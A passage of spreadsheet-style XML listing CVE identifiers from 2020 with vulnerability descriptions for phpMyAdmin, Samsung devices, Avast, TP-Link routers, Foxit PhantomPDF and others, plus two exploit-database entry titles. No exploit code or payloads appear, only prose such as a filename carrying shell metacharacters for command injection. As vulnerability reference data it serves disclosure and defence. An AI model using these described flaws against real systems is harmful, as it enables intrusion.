    <t>In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was discovered where malicious code could be used to trigger an XSS attack through retrieving and displaying results (in tbl_get_field.php and libraries/classes/Display/Results.php). The attacker must be able to insert crafted data into certain database tables, which when retrieved (for instance, through the Browse tab) can trigger the XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-10804</t>
  </si>
  <si>
    <t>In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted username, and then trick the victim into performing specific actions with that user account (such as editing its privileges).</t>
  </si>
  <si>
    <t>CVE-2020-10806</t>
  </si>
  <si>
    <t>eZ Publish Kernel before 5.4.14.1, 6.x before 6.13.6.2, and 7.x before 7.5.6.2 and eZ Publish Legacy before 5.4.14.1, 2017 before 2017.12.7.2, and 2019 before 2019.03.4.2 allow remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.</t>
  </si>
  <si>
    <t>CVE-2020-10807</t>
  </si>
  <si>
    <t>auth_svc in Caldera before 2.6.5 allows authentication bypass (for REST API requests) via a forged "localhost" string in the HTTP Host header.</t>
  </si>
  <si>
    <t>CVE-2020-10808</t>
  </si>
  <si>
    <t>Vesta Control Panel (VestaCP) through 0.9.8-26 allows Command Injection via the schedule/backup Backup Listing Endpoint. The attacker must be able to create a crafted filename on the server, as demonstrated by an FTP session that renames .bash_logout to a .bash_logout' substring followed by shell metacharacters.</t>
  </si>
  <si>
    <t>CVE-2020-10809</t>
  </si>
  <si>
    <t>An issue was discovered in HDF5 through 1.12.0. A heap-based buffer overflow exists in the function Decompress() located in decompress.c. It can be triggered by sending a crafted file to the gif2h5 binary. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-1081</t>
  </si>
  <si>
    <t>CVE-2020-10810</t>
  </si>
  <si>
    <t>An issue was discovered in HDF5 through 1.12.0. A NULL pointer dereference exists in the function H5AC_unpin_entry() located in H5AC.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-10811</t>
  </si>
  <si>
    <t>An issue was discovered in HDF5 through 1.12.0. A heap-based buffer over-read exists in the function H5O__layout_decode() located in H5Olayout.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-10812</t>
  </si>
  <si>
    <t>An issue was discovered in HDF5 through 1.12.0. A NULL pointer dereference exists in the function H5F_get_nrefs() located in H5Fquery.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-10813</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in FTPDMIN 0.96 allows attackers to crash the server via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-10814</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in Code::Blocks 17.12 allows an attacker to execute arbitrary code via a crafted project file.</t>
  </si>
  <si>
    <t>CVE-2020-10816</t>
  </si>
  <si>
    <t>Zoho ManageEngine Applications Manager 14780 and before allows a remote unauthenticated attacker to register managed servers via AAMRequestProcessor servlet.</t>
  </si>
  <si>
    <t>CVE-2020-10817</t>
  </si>
  <si>
    <t>The custom-searchable-data-entry-system (aka Custom Searchable Data Entry System) plugin through 1.7.1 for WordPress allows SQL Injection. NOTE: this product is discontinued.</t>
  </si>
  <si>
    <t>CVE-2020-10818</t>
  </si>
  <si>
    <t>Artica Proxy 4.26 allows remote command execution for an authenticated user via shell metacharacters in the "Modify the hostname" field.</t>
  </si>
  <si>
    <t>CVE-2020-10819</t>
  </si>
  <si>
    <t>Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ username parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1082</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1088.</t>
  </si>
  <si>
    <t>CVE-2020-10820</t>
  </si>
  <si>
    <t>Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ password parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10821</t>
  </si>
  <si>
    <t>Nagios XI 5.6.11 allows XSS via the account/main.php theme parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10823</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in /cgi-bin/activate.cgi through var parameter on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve code execution via a remote HTTP request (issue 1 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-10824</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in /cgi-bin/activate.cgi through ticket parameter on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve code execution via a remote HTTP request (issue 2 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-10825</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in /cgi-bin/activate.cgi while base64 decoding ticket parameter on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve code execution via a remote HTTP request (issue 3 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-10826</t>
  </si>
  <si>
    <t>/cgi-bin/activate.cgi on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve command injection via a remote HTTP request in DEBUG mode.</t>
  </si>
  <si>
    <t>CVE-2020-10827</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in apmd on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve code execution via a remote HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-10828</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in cvmd on Draytek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1 allows remote attackers to achieve code execution via a remote HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-10829</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.0), P(9.0), and Q(10.0) (Broadcom chipsets) software. A kernel driver heap overflow leads to arbitrary code execution. The Samsung ID is SVE-2019-15880 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1083</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0921.</t>
  </si>
  <si>
    <t>CVE-2020-10830</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. Attackers can view notifications by entering many PINs in Lockdown mode. The Samsung ID is SVE-2019-16590 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10831</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Attackers can trigger an update to arbitrary touch-screen firmware. The Samsung ID is SVE-2019-16013 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10832</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) (Exynos chipsets) software. Kernel Wi-Fi drivers allow out-of-bounds Read or Write operations (e.g., a buffer overflow). The Samsung IDs are SVE-2019-16125, SVE-2019-16134, SVE-2019-16158, SVE-2019-16159, SVE-2019-16319, SVE-2019-16320, SVE-2019-16337, SVE-2019-16464, SVE-2019-16465, SVE-2019-16467 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10833</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. The DeX Lockscreen allows attackers to access the quick panel and notifications. The Samsung ID is SVE-2019-16532 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10834</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) software. Attackers can view notifications on the lock screen via Routines. The Samsung ID is SVE-2019-15074 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10835</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with any (before February 2020 for Exynos modem chipsets) software. There is a buffer overflow in baseband CP message decoding. The Samsung IDs are SVE-2019-15816 and SVE-2019-15817 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10836</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (Exynos chipsets) software. The Widevine Trustlet allows read and write operations on arbitrary memory locations. The Samsung ID is SVE-2019-15873 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10837</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (with TEEGRIS) software. The Esecomm Trustlet allows a stack overflow and arbitrary code execution. The Samsung ID is SVE-2019-15984 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10838</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. PROCA allows a use-after-free and arbitrary code execution. The Samsung ID is SVE-2019-16132 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10839</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) via a SIM card. The Samsung ID is SVE-2019-16193 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1084</t>
  </si>
  <si>
    <t>A Denial Of Service vulnerability exists when Connected User Experiences and Telemetry Service fails to validate certain function values.An attacker who successfully exploited this vulnerability could deny dependent security feature functionality.To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service validates certain function values., aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1123.</t>
  </si>
  <si>
    <t>CVE-2020-10840</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (Exynos 9610 chipsets) software. There is a kernel pointer leak in the vipx driver. The Samsung ID is SVE-2019-16293 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10841</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (Exynos 9610 chipsets) software. There is an arbitrary kfree in the vipx and vertex drivers. The Samsung ID is SVE-2019-16294 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10842</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (S.LSI chipsets) software. There is a heap out-of-bounds write in the tsmux driver. The Samsung ID is SVE-2019-16295 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10843</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (S.LSI chipsets) software. There are race conditions in the hdcp2 driver. The Samsung ID is SVE-2019-16296 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10844</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.x), and Q(10.0) software. There is an out-of-bounds read vulnerability in media.audio_policy. The Samsung ID is SVE-2019-16333 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10845</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. There is a race condition leading to a use-after-free in MTP. The Samsung ID is SVE-2019-16520 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10846</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.x) and Q(10.x) software. Attackers can enable the OEM unlock feature on a KG-enrolled devices, leading to potentially unwanted binaries being downloaded. The Samsung ID is SVE-2019-16554 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10847</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) (Galaxy S8 and Note8) software. Facial recognition can be spoofed. The Samsung ID is SVE-2019-16614 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10848</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (Exynos 9810 chipsets) software. Arbitrary memory mapping exists in TEE. The Samsung ID is SVE-2019-16665 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10849</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (Exynos7885, Exynos8895, and Exynos9810 chipsets) software. The Gatekeeper trustlet allows a brute-force attack on the screen lock password. The Samsung ID is SVE-2019-14575 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1085</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory, aka 'Windows Function Discovery Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10850</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (Exynos chipsets) software. The secure bootloade has a buffer overflow of the USB buffer, leading to arbitrary code execution. The Samsung ID is SVE-2019-15872 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10851</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. There is a stack overflow in the kperfmon driver. The Samsung ID is SVE-2019-15876 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10852</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. There is a stack overflow in display driver. The Samsung ID is SVE-2019-15877 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10853</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) software. Gallery leaks cached data. The Samsung IDs are SVE-2019-16010, SVE-2019-16011, SVE-2019-16012 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10854</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Kernel stack addresses are leaked to userspace. The Samsung ID is SVE-2019-16161 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10855</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) software. Attackers can bypass Factory Reset Protection (FRP) via AppTray. The Samsung ID is SVE-2019-16192 (January 2020).</t>
  </si>
  <si>
    <t>CVE-2020-10857</t>
  </si>
  <si>
    <t>Zulip Desktop before 5.0.0 improperly uses shell.openExternal and shell.openItem with untrusted content, leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10858</t>
  </si>
  <si>
    <t>Zulip Desktop before 5.0.0 allows attackers to perform recording via the webcam and microphone due to a missing permission request handler.</t>
  </si>
  <si>
    <t>CVE-2020-10859</t>
  </si>
  <si>
    <t>Zoho ManageEngine Desktop Central before 10.0.484 allows authenticated arbitrary file writes during ZIP archive extraction via Directory Traversal in a crafted AppDependency API request.</t>
  </si>
  <si>
    <t>CVE-2020-1086</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-10860</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. An Arbitrary Memory Address Overwrite vulnerability in the aswAvLog Log Library results in Denial of Service of the Avast Service (AvastSvc.exe).</t>
  </si>
  <si>
    <t>CVE-2020-10861</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Arbitrary File Deletion from Avast Program Path via RPC, when Self Defense is Enabled.</t>
  </si>
  <si>
    <t>CVE-2020-10862</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Local Privilege Escalation (LPE) via RPC.</t>
  </si>
  <si>
    <t>CVE-2020-10863</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a shutdown via RPC from a Low Integrity process via TempShutDownMachine.</t>
  </si>
  <si>
    <t>CVE-2020-10864</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a reboot via RPC from a Low Integrity process.</t>
  </si>
  <si>
    <t>CVE-2020-10865</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to make arbitrary changes to the Components section of the Stats.ini file via RPC from a Low Integrity process.</t>
  </si>
  <si>
    <t>CVE-2020-10866</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to enumerate the network interfaces and access points from a Low Integrity process via RPC.</t>
  </si>
  <si>
    <t>CVE-2020-10867</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to bypass intended access restrictions on tasks from an untrusted process, when Self Defense is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-10868</t>
  </si>
  <si>
    <t>An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to launch the Repair App RPC call from a Low Integrity process.</t>
  </si>
  <si>
    <t>CVE-2020-1087</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1114.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48241.py</t>
  </si>
  <si>
    <t>rConfig 3.9.4 - 'search.crud.php' Remote Command Injection</t>
  </si>
  <si>
    <t>2020-03-23</t>
  </si>
  <si>
    <t>CVE-2020-10870</t>
  </si>
  <si>
    <t>Zim through 0.72.1 creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10871</t>
  </si>
  <si>
    <t>** DISPUTED ** In OpenWrt LuCI git-20.x, remote unauthenticated attackers can retrieve the list of installed packages and services. NOTE: the vendor disputes the significance of this report because, for instances reachable by an unauthenticated actor, the same information is available in other (more complex) ways, and there is no plan to restrict the information further.</t>
  </si>
  <si>
    <t>CVE-2020-10874</t>
  </si>
  <si>
    <t>Motorola FX9500 devices allow remote attackers to read database files.</t>
  </si>
  <si>
    <t>CVE-2020-10875</t>
  </si>
  <si>
    <t>Motorola FX9500 devices allow remote attackers to conduct absolute path traversal attacks, as demonstrated by PL/SQL Server Pages files such as /include/viewtagdb.psp.</t>
  </si>
  <si>
    <t>CVE-2020-10876</t>
  </si>
  <si>
    <t>The OKLOK (3.1.1) mobile companion app for Fingerprint Bluetooth Padlock FB50 (2.3) does not correctly implement its timeout on the four-digit verification code that is required for resetting passwords, nor does it properly restrict excessive verification attempts. This allows an attacker to brute force the four-digit verification code in order to bypass email verification and change the password of a victim account.</t>
  </si>
  <si>
    <t>CVE-2020-10878</t>
  </si>
  <si>
    <t>Perl before 5.30.3 has an integer overflow related to mishandling of a "PL_regkind[OP(n)] == NOTHING" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.</t>
  </si>
  <si>
    <t>CVE-2020-10879</t>
  </si>
  <si>
    <t>rConfig before 3.9.5 allows command injection by sending a crafted GET request to lib/crud/search.crud.php since the nodeId parameter is passed directly to the exec function without being escaped.</t>
  </si>
  <si>
    <t>CVE-2020-1088</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1082.</t>
  </si>
  <si>
    <t>exploits/linux_mips/remote/48331.rb</t>
  </si>
  <si>
    <t>TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-10881</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DNS responses. A crafted DNS message can trigger an overflow of a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-9660.</t>
  </si>
  <si>
    <t>CVE-2020-10882</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by default. When parsing the slave_mac parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-9650.</t>
  </si>
  <si>
    <t>CVE-2020-10883</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the file system. The issue lies in the lack of proper permissions set on the file system. An attacker can leverage this vulnerability to escalate privileges. Was ZDI-CAN-9651.</t>
  </si>
  <si>
    <t>CVE-2020-10884</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by default. This issue results from the use of hard-coded encryption key. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-9652.</t>
  </si>
  <si>
    <t>CVE-2020-10885</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DNS responses. The issue results from the lack of proper validation of DNS reponses prior to further processing. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the root user. Was ZDI-CAN-9661.</t>
  </si>
  <si>
    <t>CVE-2020-10886</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tmpServer service, which listens on TCP port 20002. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9662.</t>
  </si>
  <si>
    <t>CVE-2020-10887</t>
  </si>
  <si>
    <t>This vulnerability allows a firewall bypass on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of IPv6 connections. The issue results from the lack of proper filtering of IPv6 SSH connections. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-9663.</t>
  </si>
  <si>
    <t>CVE-2020-10888</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to bypass authentication on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SSH port forwarding requests during initial setup. The issue results from the lack of proper authentication prior to establishing SSH port forwarding rules. An attacker can leverage this vulnerability to escalate privileges to resources normally protected from the WAN interface. Was ZDI-CAN-9664.</t>
  </si>
  <si>
    <t>CVE-2020-10889</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the DuplicatePages command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9828.</t>
  </si>
  <si>
    <t>CVE-2020-10890</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the communication API. The issue lies in the handling of the ConvertToPDF command, which allows an arbitrary file write with attacker controlled data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9829.</t>
  </si>
  <si>
    <t>CVE-2020-10891</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Save command of the communication API. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9831.</t>
  </si>
  <si>
    <t>CVE-2020-10892</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the communication API. The issue lies in the handling of the CombineFiles command, which allows an arbitrary file write with attacker controlled data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9830.</t>
  </si>
  <si>
    <t>CVE-2020-10893</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in a PDF. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10189.</t>
  </si>
  <si>
    <t>CVE-2020-10894</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in a PDF. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-10190.</t>
  </si>
  <si>
    <t>CVE-2020-10895</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10191.</t>
  </si>
  <si>
    <t>CVE-2020-10896</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10192.</t>
  </si>
  <si>
    <t>CVE-2020-10897</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10193.</t>
  </si>
  <si>
    <t>CVE-2020-10898</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10195.</t>
  </si>
  <si>
    <t>CVE-2020-10899</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.1.29511. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XFA templates. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-10132.</t>
  </si>
  <si>
    <t>CVE-2020-1090</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-10900</t>
  </si>
  <si>
